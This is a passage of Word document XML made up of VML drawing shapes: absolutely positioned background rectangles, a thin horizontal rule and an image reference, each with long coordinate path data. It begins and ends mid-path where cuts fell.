84,14512,10484,14517,10484,14522,10484,14527,10484,14532,10484,14538,10484,14543,10484,14549,10484,14554,10484,14560,10484,14566,10484,14572,10484,14579,10484,14585,10484,14591,10484,14598,10484,14605,10484,14612,10484,14619,10484,14626,10484,14633,10484,14640,10484,14648,10484,14656,10484,14664,10484,14672,10484,14680,10484,14688,10484,14696,10484,14705,10484,14714,10484,14722,10484,14731,10484,14731,10484,14731,10484,14731,10484,14731,10484,14731,10484,14731,10483,14731,10482,14731,10482,14731,10480,14731,10479,14731,10477,14731,10475,14731,10473,14731,10470,14731,10466,14731,10462,14731,10458,14731,10453,14731,10448,14731,10442,14731,10435,14731,10428,14731,10419,14731,10411,14731,10401,14731,10391,14731,10379,14731,10367,14731,10354,14731,10340,14731,10326,14731,10310,14731,10293,14731,10275,14731,10256,14731,10236,14731,10215,14731,10192,14731,10168,14731,10143,14731,10117,14731,10090,14731,10061,14731,10031,14731,9999,14731,9966,14731,9931,14731,9895,14731,9858,14731,9819,14731,9778,14731,9735,14731,9691,14731,9646,14731,9598,14731,9549,14731,9498,14731,9445,14731,9391,14731,9334,14731,9275,14731,9215,14731,9153,14731,9088,14731,9022,14731,8953,14731,8883,14731,8810,14731,8735,14731,8658,14731,8578,14731,8497,14731,8413,14731,8326,14731,8238,14731,8146,14731,8053,14731,7957,14731,7859,14731,7758,14731,7654,14731,7548,14731,7439,14731,7328,14731,7214,14731,7097,14731,6977,14731,6855,14731,6730,14731,6602,14731,6471,14731,6337,14731,6201,14731,6061,14731,5918,14731,5773,14731,5624,14731,5472,14731,5317,14731,5159,14731,4997,14731,4833,14731,4665,14731,4494,14731,4319,14731,4141,14731,3960,14731,3776,14731,3587,14731,3396,14731,3201,14731,3002,14731,2800,14731,2594,14731,2385,14731,2172,14731,1955,14731,1734,14731,1510,14731,1510,14731,1510,14731,1510,14731,1510,14731,1510,14731,1510,14731,1510,14731,1510,14731,1510,14731,1510,14731,1510,14731,1510,14731,1510,14731,1510,14731,1510,14731,1510,14731,1510,14731,1510,14730,1510,14730,1510,14730,1510,14730,1510,14729,1510,14729,1510,14729,1510,14728,1510,14728,1510,14728,1510,14727,1510,14727,1510,14726,1510,14726,1510,14725,1510,14724,1510,14724,1510,14723,1510,14722,1510,14721,1510,14721,1510,14720,1510,14719,1510,14718,1510,14717,1510,14716,1510,14714,1510,14713,1510,14712,1510,14711,1510,14709,1510,14708,1510,14706,1510,14705,1510,14703,1510,14701,1510,14700,1510,14698,1510,14696,1510,14694,1510,14692,1510,14690,1510,14688,1510,14685,1510,14683,1510,14680,1510,14678,1510,14675,1510,14673,1510,14670,1510,14667,1510,14664,1510,14661,1510,14658,1510,14655,1510,14652,1510,14648,1510,14645,1510,14641,1510,14638,1510,14634,1510,14630,1510,14626,1510,14622,1510,14618,1510,14614,1510,14609,1510,14605,1510,14600,1510,14595,1510,14591,1510,14586,1510,14581,1510,14576,1510,14570,1510,14565,1510,14560,1510,14554,1510,14548,1510,14542,1510,14536,1510,14530,1510,14524,1510,14518,1510,14511,1510,14505,1510,14498,1510,14491,1510,14484,1510,14477,1510,14470,1510,14462,1510,14455,1510,14447,1510,14439,1510,14431,1510,14423,1510,14415,1510,14406,1510,14398,1510,14389,1510,14380,1510,14371e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:735.500pt;width:449.500pt;height:0.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,14710" coordsize="8990,10">
        <v:shape style="position:absolute;left:1490;top:14710;width:8990;height:10" coordorigin="1490,14710" coordsize="8990,10" path="m1510,14724l1510,14724,1510,14724,1510,14724,1510,14724,1510,14724,1510,14724,1511,14724,1512,14724,1512,14724,1514,14724,1515,14724,1517,14724,1519,14724,1521,14724,1524,14724,1528,14724,1532,14724,1536,14724,1541,14724,1546,14724,1552,14724,1559,14724,1566,14724,1575,14724,1583,14724,1593,14724,1603,14724,1615,14724,1627,14724,1640,14724,1654,14724,1668,14724,1684,14724,1701,14724,1719,14724,1738,14724,1758,14724,1780,14724,1802,14724,1826,14724,1851,14724,1877,14724,1904,14724,1933,14724,1963,14724,1995,14724,2028,14724,2063,14724,2099,14724,2136,14724,2175,14724,2216,14724,2259,14724,2303,14724,2348,14724,2396,14724,2445,14724,2496,14724,2549,14724,2604,14724,2660,14724,2719,14724,2779,14724,2841,14724,2906,14724,2972,14724,3041,14724,3112,14724,3184,14724,3259,14724,3336,14724,3416,14724,3498,14724,3582,14724,3668,14724,3757,14724,3848,14724,3941,14724,4037,14724,4136,14724,4236,14724,4340,14724,4446,14724,4555,14724,4666,14724,4780,14724,4897,14724,5017,14724,5139,14724,5264,14724,5392,14724,5523,14724,5657,14724,5793,14724,5933,14724,6076,14724,6222,14724,6370,14724,6522,14724,6677,14724,6835,14724,6997,14724,7161,14724,7329,14724,7500,14724,7675,14724,7853,14724,8034,14724,8219,14724,8407,14724,8598,14724,8793,14724,8992,14724,9194,14724,9400,14724,9609,14724,9823,14724,10039,14724,10260,14724,10484,14724e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:717.600pt;width:445.800pt;height:18.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId13" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:132.500pt;margin-top:51.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2650,1030" coordsize="130,270">
        <v:shape style="position:absolute;left:2650;top:1030;width:130;height:270" coordorigin="2650,1030" coordsize="130,270" path="m2665,1045l2665,1045,2665,1045,2665,1045,2665,1045,2665,1045,2665,1045,2665,1045,2665,1045,2665,1045,2665,1045,2665,1045,2665,1045,2665,1045,2665,1045,2666,1045,2666,1045,2666,1045,2666,1045,2666,1045,2666,1045,2666,1045,2666,1045,2666,1045,2666,1045,2666,1045,2666,1045,2667,1045,2667,1045,2667,1045,2667,1045,2667,1045,2667,1045,2668,1045,2668,1045,2668,1045,2668,1045,2669,1045,2669,1045,2669,1045,2670,1045,2670,1045,2670,1045,2671,1045,2671,1045,2671,1045,2672,1045,2672,1045,2673,1045,2673,1045,2674,1045,2674,1045,2675,1045,2675,1045,2676,1045,2677,1045,2677,1045,2678,1045,2679,1045,2679,1045,2680,1045,2681,1045,2682,1045,2682,1045,2683,1045,2684,1045,2685,1045,2686,1045,2687,1045,2688,1045,2689,1045,2690,1045,2691,1045,2692,1045,2693,1045,2694,1045,2695,1045,2697,1045,2698,1045,2699,1045,2700,1045,2702,1045,2703,1045,2705,1045,2706,1045,2708,1045,2709,1045,2711,1045,2712,1045,2714,1045,2716,1045,2717,1045,2719,1045,2721,1045,2723,1045,2725,1045,2726,1045,2728,1045,2730,1045,2732,1045,2734,1045,2737,1045,2739,1045,2741,1045,2743,1045,2745,1045,2748,1045,2750,1045,2753,1045,2755,1045,2758,1045,2760,1045,2763,1045,2765,1045,2768,1045,2771,1045,2774,1045,2777,1045,2779,1045,2782,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1046,2785,1046,2785,1046,2785,1046,2785,1046,2785,1047,2785,1047,2785,1047,2785,1048,2785,1048,2785,1048,2785,1049,2785,1049,2785,1049,2785,1050,2785,1050,2785,1051,2785,1052,2785,1052,2785,1053,2785,1054,2785,1054,2785,1055,2785,1056,2785,1057,2785,1057,2785,1058,2785,1059,2785,1060,2785,1061,2785,1062,2785,1063,2785,1065,2785,1066,2785,1067,2785,1068,2785,1070,2785,1071,2785,1073,2785,1074,2785,1076,2785,1077,2785,1079,2785,1081,2785,1082,2785,1084,2785,1086,2785,1088,2785,1090,2785,1092,2785,1094,2785,1096,2785,1099,2785,1101,2785,1103,2785,1106,2785,1108,2785,1111,2785,1114,2785,1116,2785,1119,2785,1122,2785,1125,2785,1128,2785,1131,2785,1134,2785,1138,2785,1141,2785,1144,2785,1148,2785,1151,2785,1155,2785,1159,2785,1162,2785,1166,2785,1170,2785,1174,2785,1178,2785,1183,2785,1187,2785,1191,2785,1196,2785,1201,2785,1205,2785,1210,2785,1215,2785,1220,2785,1225,2785,1230,2785,1235,2785,1241,2785,1246,2785,1252,2785,1257,2785,1263,2785,1269,2785,1275,2785,1281,2785,1287,2785,1293,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2784,1300,2784,1300,2784,1300,2784,1300,2784,1300,2784,1300,2783,1300,2783,1300,2783,1300,2783,1300,2783,1300,2782,1300,2782,1300,2782,1300,2781,1300,2781,1300,2781,1300,2780,1300,2780,1300,2780,1300,2779,1300,2779,1300,2778,1300,2778,1300,2778,1300,2777,1300,2776,1300,2776,1300,2775,1300,2775,1300,2774,1300,2774,1300,2773,1300,2772,1300,2772,1300,2771,1300,2770,1300,2769,1300,2768,1300,2768,1300,2767,1300,2766,1300,2765,1300,2764,1300,2763,1300,2762,1300,2761,1300,2760,1300,2759,1300,2758,1300,2757,1300,2755,1300,2754,1300,2753,1300,2752,1300,2750,1300,2749,1300,2748,1300,2746,1300,2745,1300,2743,1300,2742,1300,2740,1300,2738,1300,2737,1300,2735,1300,2733,1300,2732,1300,2730,1300,2728,1300,2726,1300,2724,1300,2722,1300,2720,1300,2718,1300,2716,1300,2714,1300,2712,1300,2710,1300,2708,1300,2705,1300,2703,1300,2701,1300,2698,1300,2696,1300,2693,1300,2691,1300,2688,1300,2685,1300,2683,1300,2680,1300,2677,1300,2674,1300,2671,1300,2668,1300,2665,1300,2665,1300,2665,1300,2665,1300,2665,1300,2665,1300,2665,1300,2665,1300,2665,1300,2665,1300,2665,1300,2665,1300,2665,1299,2665,1299,2665,1299,2665,1299,2665,1299,2665,1299,2665,1299,2665,1299,2665,1299,2665,1298,2665,1298,2665,1298,2665,1298,2665,1298,2665,1297,2665,1297,2665,1297,2665,1296,2665,1296,2665,1296,2665,1295,2665,1295,2665,1294,2665,1294,2665,1293,2665,1293,2665,1292,2665,1291,2665,1291,2665,1290,2665,1289,2665,1288,2665,1288,2665,1287,2665,1286,2665,1285,2665,1284,2665,1283,2665,1282,2665,1281,2665,1280,2665,1278,2665,1277,2665,1276,2665,1274,2665,1273,2665,1272,2665,1270,2665,1269,2665,1267,2665,1265,2665,1264,2665,1262,2665,1260,2665,1258,2665,1256,2665,1254,2665,1252,2665,1250,2665,1248,2665,1245,2665,1243,2665,1241,2665,1238,2665,1236,2665,1233,2665,1231,2665,1228,2665,1225,2665,1222,2665,1219,2665,1216,2665,1213,2665,1210,2665,1207,2665,1203,2665,1200,2665,1196,2665,1193,2665,1189,2665,1186,2665,1182,2665,1178,2665,1174,2665,1170,2665,1166,2665,1161,2665,1157,2665,1153,2665,1148,2665,1144,2665,1139,2665,1134,2665,1129,2665,1124,2665,1119,2665,1114,2665,1109,2665,1104,2665,1098,2665,1093,2665,1087,2665,1081,2665,1075,2665,1069,2665,1063,2665,1057,2665,1051,2665,1045e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:150.500pt;margin-top:51.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3010,1030" coordsize="130,270">
        <v:shape style="position:absolute;left:3010;top:1030;width:130;height:270" coordorigin="3010,1030" coordsize="130,270" path="m3026,1045l3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3027,1045,3027,1045,3027,1045,3027,1045,3027,1045,3027,1045,3027,1045,3028,1045,3028,1045,3028,1045,3028,1045,3029,1045,3029,1045,3029,1045,3029,1045,3030,1045,3030,1045,3030,1045,3031,1045,3031,1045,3032,1045,3032,1045,3032,1045,3033,1045,3033,1045,3034,1045,3034,1045,3035,1045,3036,1045,3036,1045,3037,1045,3037,1045,3038,1045,3039,1045,3039,1045,3040,1045,3041,1045,3042,1045,3043,1045,3043,1045,3044,1045,3045,1045,3046,1045,3047,1045,3048,1045,3049,1045,3050,1045,3051,1045,3052,1045,3053,1045,3054,1045,3056,1045,3057,1045,3058,1045,3059,1045,3061,1045,3062,1045,3063,1045,3065,1045,3066,1045,3068,1045,3069,1045,3071,1045,3072,1045,3074,1045,3076,1045,3077,1045,3079,1045,3081,1045,3083,1045,3085,1045,3087,1045,3089,1045,3091,1045,3093,1045,3095,1045,3097,1045,3099,1045,3101,1045,3103,1045,3106,1045,3108,1045,3110,1045,3113,1045,3115,1045,3118,1045,3120,1045,3123,1045,3126,1045,3128,1045,3131,1045,3134,1045,3137,1045,3140,1045,3143,1045,3146,1045,3146,1045,3146,1045,3146,1045,3146,1045,3146,1045,3146,1045,3146,1045,3146,1045,3146,1045,3146,1045,3146,1045,3146,1045,3146,1045,3146,1045,3146,1045,3146,1045,3146,1045,3146,1045,3146,1045,3146,1046,3146,1046,3146,1046,3146,1046,3146,1046,3146,1047,3146,1047,3146,1047,3146,1048,3146,1048,3146,1048,3146,1049,3146,1049,3146,1049,3146,1050,3146,1050,3146,1051,3146,1052,3146,1052,3146,1053,3146,1054,3146,1054,3146,1055,3146,1056,3146,1057,3146,1057,3146,1058,3146,1059,3146,1060,3146,1061,3146,1062,3146,1063,3146,1065,3146,1066,3146,1067,3146,1068,3146,1070,3146,1071,3146,1073,3146,1074,3146,1076,3146,1077,3146,1079,3146,1081,3146,1082,3146,1084,3146,1086,3146,1088,3146,1090,3146,1092,3146,1094,3146,1096,3146,1099,3146,1101,3146,1103,3146,1106,3146,1108,3146,1111,3146,1114,3146,1116,3146,1119,3146,1122,3146,1125,3146,1128,3146,1131,3146,1134,3146,1138,3146,1141,3146,1144,3146,1148,3146,1151,3146,1155,3146,1159,3146,1162,3146,1166,3146,1170,3146,1174,3146,1178,3146,1183,3146,1187,3146,1191,3146,1196,3146,1201,3146,1205,3146,1210,3146,1215,3146,1220,3146,1225,3146,1230,3146,1235,3146,1241,3146,1246,3146,1252,3146,1257,3146,1263,3146,1269,3146,1275,3146,1281,3146,1287,3146,1293,3146,1300,3146,1300,3146,1300,3146,1300,3146,1300,3146,1300,3146,1300,3146,1300,3146,1300,3146,1300,3146,1300,3146,1300,3145,1300,3145,1300,3145,1300,3145,1300,3145,1300,3145,1300,3145,1300,3145,1300,3145,1300,3145,1300,3145,1300,3145,1300,3145,1300,3145,1300,3144,1300,3144,1300,3144,1300,3144,1300,3144,1300,3144,1300,3143,1300,3143,1300,3143,1300,3143,1300,3143,1300,3142,1300,3142,1300,3142,1300,3141,1300,3141,1300,3141,1300,3140,1300,3140,1300,3140,1300,3139,1300,3139,1300,3138,1300,3138,1300,3137,1300,3137,1300,3136,1300,3136,1300,3135,1300,3134,1300,3134,1300,3133,1300,3132,1300,3132,1300,3131,1300,3130,1300,3129,1300,3129,1300,3128,1300,3127,1300,3126,1300,3125,1300,3124,1300,3123,1300,3122,1300,3121,1300,3120,1300,3119,1300,3118,1300,3117,1300,3116,1300,3114,1300,3113,1300,3112,1300,3110,1300,3109,1300,3108,1300,3106,1300,3105,1300,3103,1300,3102,1300,3100,1300,3099,1300,3097,1300,3095,1300,3094,1300,3092,1300,3090,1300,3088,1300,3086,1300,3084,1300,3083,1300,3081,1300,3079,1300,3076,1300,3074,1300,3072,1300,3070,1300,3068,1300,3065,1300,3063,1300,3061,1300,3058,1300,3056,1300,3053,1300,3051,1300,3048,1300,3045,1300,3043,1300,3040,1300,3037,1300,3034,1300,3031,1300,3029,1300,3026,1300,3026,1300,3026,1300,3026,1300,3026,1300,3026,1300,3026,1300,3026,1300,3026,1300,3026,1300,3026,1300,3026,1300,3026,1299,3026,1299,3026,1299,3026,1299,3026,1299,3026,1299,3026,1299,3026,1299,3026,1299,3026,1298,3026,1298,3026,1298,3026,1298,3026,1298,3026,1297,3026,1297,3026,1297,3026,1296,3026,1296,3026,1296,3026,1295,3026,1295,3026,1294,3026,1294,3026,1293,3026,1293,3026,1292,3026,1291,3026,1291,3026,1290,3026,1289,3026,1288,3026,1288,3026,1287,3026,1286,3026,1285,3026,1284,3026,1283,3026,1282,3026,1281,3026,1280,3026,1278,3026,1277,3026,1276,3026,1274,3026,1273,3026,1272,3026,1270,3026,1269,3026,1267,3026,1265,3026,1264,3026,1262,3026,1260,3026,1258,3026,1256,3026,1254,3026,1252,3026,1250,3026,1248,3026,1245,3026,1243,3026,1241,3026,1238,3026,1236,3026,1233,3026,1231,3026,1228,3026,1225,3026,1222,3026,1219,3026,1216,3026,1213,3026,1210,3026,1207,3026,1203,3026,1200,3026,1196,3026,1193,3026,1189,3026,1186,3026,1182,3026,1178,3026,1174,3026,1170,3026,1166,3026,1161,3026,1157,3026,1153,3026,1148,3026,1144,3026,1139,3026,1134,3026,1129,3026,1124,3026,1119,3026,1114,3026,1109,3026,1104,3026,1098,3026,1093,3026,1087,3026,1081,3026,1075,3026,1069,3026,1063,3026,1057,3026,1051,3026,1045e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:498.500pt;margin-top:51.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="9970,1030" coordsize="130,270">
        <v:shape style="position:absolute;left:9970;top:1030;width:130;height:270" coordorigin="9970,1030" coordsize="130,270" path="m9989,1045l9989,1045,9989,1045,9989,1045,9989,1045,9989,1045,9989,1045,9989,1045,9989,1045,9989,1045,9989,1045,9989,1045,9989,1045,9989,1045,9989,1045,9989,1045,9989,1045,9989,1045,9989,1045,9989,1045,9990,1045,9990,1045,9990,1045,9990,1045,9990,1045,9990,1045,9990,1045,9990,1045,9990,1045,9991,1045,9991,1045,9991,1045,9991,1045,9991,1045,9992,1045,9992,1045,9992,1045,9992,1045,9993,1045,9993,1045,9993,1045,9994,1045,9994,1045,9994,1045,9995,1045,9995,1045,9996,1045,9996,1045,9996,1045,9997,1045,9997,1045,9998,1045,9998,1045,9999,1045,10000,1045,10000,1045,10001,1045,10002,1045,10002,1045,10003,1045,10004,1045,10004,1045,10005,1045,10006,1045,10007,1045,10008,1045,10009,1045,10010,1045,10010,1045,10011,1045,10012,1045,10013,1045,10015,1045,10016,1045,10017,1045,10018,1045,10019,1045,10020,1045,10022,1045,10023,1045,10024,1045,10026,1045,10027,1045,10028,1045,10030,1045,10031,1045,10033,1045,10034,1045,10036,1045,10038,1045,10039,1045,10041,1045,10043,1045,10045,1045,10046,1045,10048,1045,10050,1045,10052,1045,10054,1045,10056,1045,10058,1045,10060,1045,10062,1045,10065,1045,10067,1045,10069,1045,10072,1045,10074,1045,10076,1045,10079,1045,10081,1045,10084,1045,10086,1045,10089,1045,10092,1045,10095,1045,10097,1045,10100,1045,10103,1045,10106,1045,10109,1045,10109,1045,10109,1045,10109,1045,10109,1045,10109,1045,10109,1045,10109,1045,10109,1045,10109,1045,10109,1045,10109,1045,10109,1045,10109,1045,10109,1045,10109,1045,10109,1045,10109,1045,10109,1045,10109,1045,10109,1046,10109,1046,10109,1046,10109,1046,10109,1046,10109,1047,10109,1047,10109,1047,10109,1048,10109,1048,10109,1048,10109,1049,10109,1049,10109,1049,10109,1050,10109,1050,10109,1051,10109,1052,10109,1052,10109,1053,10109,1054,10109,1054,10109,1055,10109,1056,10109,1057,10109,1057,10109,1058,10109,1059,10109,1060,10109,1061,10109,1062,10109,1063,10109,1065,10109,1066,10109,1067,10109,1068,10109,1070,10109,1071,10109,1073,10109,1074,10109,1076,10109,1077,10109,1079,10109,1081,10109,1082,10109,1084,10109,1086,10109,1088,10109,1090,10109,1092,10109,1094,10109,1096,10109,1099,10109,1101,10109,1103,10109,1106,10109,1108,10109,1111,10109,1114,10109,1116,10109,1119,10109,1122,10109,1125,10109,1128,10109,1131,10109,1134,10109,1138,10109,1141,10109,1144,10109,1148,10109,1151,10109,1155,10109,1159,10109,1162,10109,1166,10109,1170,10109,1174,10109,1178,10109,1183,10109,1187,10109,1191,10109,1196,10109,1201,10109,1205,10109,1210,10109,1215,10109,1220,10109,1225,10109,1230,10109,1235,10109,1241,10109,1246,10109,1252,10109,1257,10109,1263,10109,1269,10109,1275,10109,1281,10109,1287,10109,1293,10109,1300,10109,1300,10109,1300,10109,1300,10109,1300,10109,1300,10109,1300,10109,1300,10109,1300,10109,1300,10109,1300,10109,1300,10109,1300,10109,1300,10109,1300,10109,1300,10109,1300,10109,1300,10109,1300,10109,1300,10109,1300,10109,1300,10108,1300,10108,1300,10108,1300,10108,1300,10108,1300,10108,1300,10108,1300,10108,1300,10107,1300,10107,1300,10107,1300,10107,1300,10107,1300,10106,1300,10106,1300,10106,1300,10105,1300,10105,1300,10105,1300,10105,1300,10104,1300,10104,1300,10103,1300,10103,1300,10103,1300,10102,1300,10102,1300,10101,1300,10101,1300,10100,1300,10100,1300,10099,1300,10098,1300,10098,1300,10097,1300,10097,1300,10096,1300,10095,1300,10094,1300,10094,1300,10093,1300,10092,1300,10091,1300,10090,1300,10090,1300,10089,1300,10088,1300,10087,1300,10086,1300,10085,1300,10084,1300,10083,1300,10081,1300,10080,1300,10079,1300,10078,1300,10077,1300,10075,1300,10074,1300,10073,1300,10071,1300,10070,1300,10068,1300,10067,1300,10065,1300,10064,1300,10062,1300,10061,1300,10059,1300,10057,1300,10055,1300,10054,1300,10052,1300,10050,1300,10048,1300,10046,1300,10044,1300,10042,1300,10040,1300,10038,1300,10036,1300,10033,1300,10031,1300,10029,1300,10027,1300,10024,1300,10022,1300,10019,1300,10017,1300,10014,1300,10012,1300,10009,1300,10006,1300,10004,1300,10001,1300,9998,1300,9995,1300,9992,1300,9989,1300,9989,1300,9989,1300,9989,1300,9989,1300,9989,1300,9989,1300,9989,1300,9989,1300,9989,1300,9989,1300,9989,1300,9989,1299,9989,1299,9989,1299,9989,1299,9989,1299,9989,1299,9989,1299,9989,1299,9989,1299,9989,1298,9989,1298,9989,1298,9989,1298,9989,1298,9989,1297,9989,1297,9989,1297,9989,1296,9989,1296,9989,1296,9989,1295,9989,1295,9989,1294,9989,1294,9989,1293,9989,1293,9989,1292,9989,1291,9989,1291,9989,1290,9989,1289,9989,1288,9989,1288,9989,1287,9989,1286,9989,1285,9989,1284,9989,1283,9989,1282,9989,1281,9989,1280,9989,1278,9989,1277,9989,1276,9989,1274,9989,1273,9989,1272,9989,1270,9989,1269,9989,1267,9989,1265,9989,1264,9989,1262,9989,1260,9989,1258,9989,1256,9989,1254,9989,1252,9989,1250,9989,1248,9989,1245,9989,1243,9989,1241,9989,1238,9989,1236,9989,1233,9989,1231,9989,1228,9989,1225,9989,1222,9989,1219,9989,1216,9989,1213,9989,1210,9989,1207,9989,1203,9989,1200,9989,1196,9989,1193,9989,1189,9989,1186,9989,1182,9989,1178,9989,1174,9989,1170,9989,1166,9989,1161,9989,1157,9989,1153,9989,1148,9989,1144,9989,1139,9989,1134,9989,1129,9989,1124,9989,1119,9989,1114,9989,1109,9989,1104,9989,1098,9989,1093,9989,1087,9989,1081,9989,1075,9989,1069,9989,1063,9989,1057,9989,1051,9989,1045e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:504.500pt;margin-top:51.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10090,1030" coordsize="130,270">
        <v:shape style="position:absolute;left:10090;top:1030;width:130;height:270" coordorigin="10090,1030" coordsize="130,270" path="m10109,1045l10109,1045,10109,1045,10109,1045,10109,1045,10109,1045,10109,1045,10109,1045,10109,1045,10109,1045,10109,1045,10109,1045,10109,1045,10109,1045,10109,1045,10109,1045,10109,1045,10109,1045,10109,1045,10110,1045,10110,1045,10110,1045,10110,1045,10110,1045,10110,1045,10110,1045,10110,1045,10110,1045,10110,1045,10111,1045,10111,1045,10111,1045,10111,1045,10111,1045,10112,1045,10112,1045,10112,1045,10112,1045,10113,1045,10113,1045,10113,1045,10114,1045,10114,1045,10114,1045,10115,1045,10115,1045,10116,1045,10116,1045,10116,1045,10117,1045,10117,1045,10118,1045,10119,1045,10119,1045,10120,1045,10120,1045,10121,1045,10122,1045,10122,1045,10123,1045,10124,1045,10124,1045,10125,1045,10126,1045,10127,1045,10128,1045,10129,1045,10130,1045,10131,1045,10131,1045,10132,1045,10134,1045,10135,1045,10136,1045,10137,1045,10138,1045,10139,1045,10140,1045,10142,1045,10143,1045,10144,1045,10146,1045,10147,1045,10148,1045,10150,1045,10151,1045,10153,1045,10154,1045,10156,1045,10158,1045,10159,1045,10161,1045,10163,1045,10165,1045,10166,1045,10168,1045,10170,1045,10172,1045,10174,1045,10176,1045,10178,1045,10180,1045,10182,1045,10185,1045,10187,1045,10189,1045,10192,1045,10194,1045,10196,1045,10199,1045,10201,1045,10204,1045,10207,1045,10209,1045,10212,1045,10215,1045,10217,1045,10220,1045,10223,1045,10226,1045,10229,1045,10229,1045,10229,1045,10229,1045,10229,1045,10229,1045,10229,1045,10229,1045,10229,1045,10229,1045,10229,1045,10229,1045,10229,1045,10229,1045,10229,1045,10229,1045,10229,1045,10229,1045,10229,1045,10229,1045,10229,1046,10229,1046,10229,1046,10229,1046,10229,1046,10229,1047,10229,1047,10229,1047,10229,1048,10229,1048,10229,1048,10229,1049,10229,1049,10229,1049,10229,1050,10229,1050,10229,1051,10229,1052,10229,1052,10229,1053,10229,1054,10229,1054,10229,1055,10229,1056,10229,1057,10229,1057,10229,1058,10229,1059,10229,1060,10229,1061,10229,1062,10229,1063,10229,1065,10229,1066,10229,1067,10229,1068,10229,1070,10229,1071,10229,1073,10229,1074,10229,1076,10229,1077,10229,1079,10229,1081,10229,1082,10229,1084,10229,1086,10229,1088,10229,1090,10229,1092,10229,1094,10229,1096,10229,1099,10229,1101,10229,1103,10229,1106,10229,1108,10229,1111,10229,1114,10229,1116,10229,1119,10229,1122,10229,1125,10229,1128,10229,1131,10229,1134,10229,1138,10229,1141,10229,1144,10229,1148,10229,1151,10229,1155,10229,1159,10229,1162,10229,1166,10229,1170,10229,1174,10229,1178,10229,1183,10229,1187,10229,1191,10229,1196,10229,1201,10229,1205,10229,1210,10229,1215,10229,1220,10229,1225,10229,1230,10229,1235,10229,1241,10229,1246,10229,1252,10229,1257,10229,1263,10229,1269,10229,1275,10229,1281,10229,1287,10229,1293,10229,1300,10229,1300,10229,1300,10229,1300,10229,1300,10229,1300,10229,1300,10229,1300,10229,1300,10229,1300,10229,1300,10229,1300,10229,1300,10229,1300,10229,1300,10229,1300,10229,1300,10229,1300,10229,1300,10229,1300,10229,1300,10229,1300,10228,1300,10228,1300,10228,1300,10228,1300,10228,1300,10228,1300,10228,1300,10228,1300,10227,1300,10227,1300,10227,1300,10227,1300,10227,1300,10226,1300,10226,1300,10226,1300,10226,1300,10225,1300,10225,1300,10225,1300,10224,1300,10224,1300,10223,1300,10223,1300,10223,1300,10222,1300,10222,1300,10221,1300,10221,1300,10220,1300,10220,1300,10219,1300,10219,1300,10218,1300,10217,1300,10217,1300,10216,1300,10215,1300,10215,1300,10214,1300,10213,1300,10212,1300,10211,1300,10210,1300,10210,1300,10209,1300,10208,1300,10207,1300,10206,1300,10205,1300,10204,1300,10203,1300,10201,1300,10200,1300,10199,1300,10198,1300,10197,1300,10195,1300,10194,1300,10193,1300,10191,1300,10190,1300,10188,1300,10187,1300,10185,1300,10184,1300,10182,1300,10181,1300,10179,1300,10177,1300,10175,1300,10174,1300,10172,1300,10170,1300,10168,1300,10166,1300,10164,1300,10162,1300,10160,1300,10158,1300,10156,1300,10154,1300,10151,1300,10149,1300,10147,1300,10144,1300,10142,1300,10139,1300,10137,1300,10134,1300,10132,1300,10129,1300,10126,1300,10124,1300,10121,1300,10118,1300,10115,1300,10112,1300,10109,1300,10109,1300,10109,1300,10109,1300,10109,1300,10109,1300,10109,1300,10109,1300,10109,1300,10109,1300,10109,1300,10109,1300,10109,1299,10109,1299,10109,1299,10109,1299,10109,1299,10109,1299,10109,1299,10109,1299,10109,1299,10109,1298,10109,1298,10109,1298,10109,1298,10109,1298,10109,1297,10109,1297,10109,1297,10109,1296,10109,1296,10109,1296,10109,1295,10109,1295,10109,1294,10109,1294,10109,1293,10109,1293,10109,1292,10109,1291,10109,1291,10109,1290,10109,1289,10109,1288,10109,1288,10109,1287,10109,1286,10109,1285,10109,1284,10109,1283,10109,1282,10109,1281,10109,1280,10109,1278,10109,1277,10109,1276,10109,1274,10109,1273,10109,1272,10109,1270,10109,1269,10109,1267,10109,1265,10109,1264,10109,1262,10109,1260,10109,1258,10109,1256,10109,1254,10109,1252,10109,1250,10109,1248,10109,1245,10109,1243,10109,1241,10109,1238,10109,1236,10109,1233,10109,1231,10109,1228,10109,1225,1010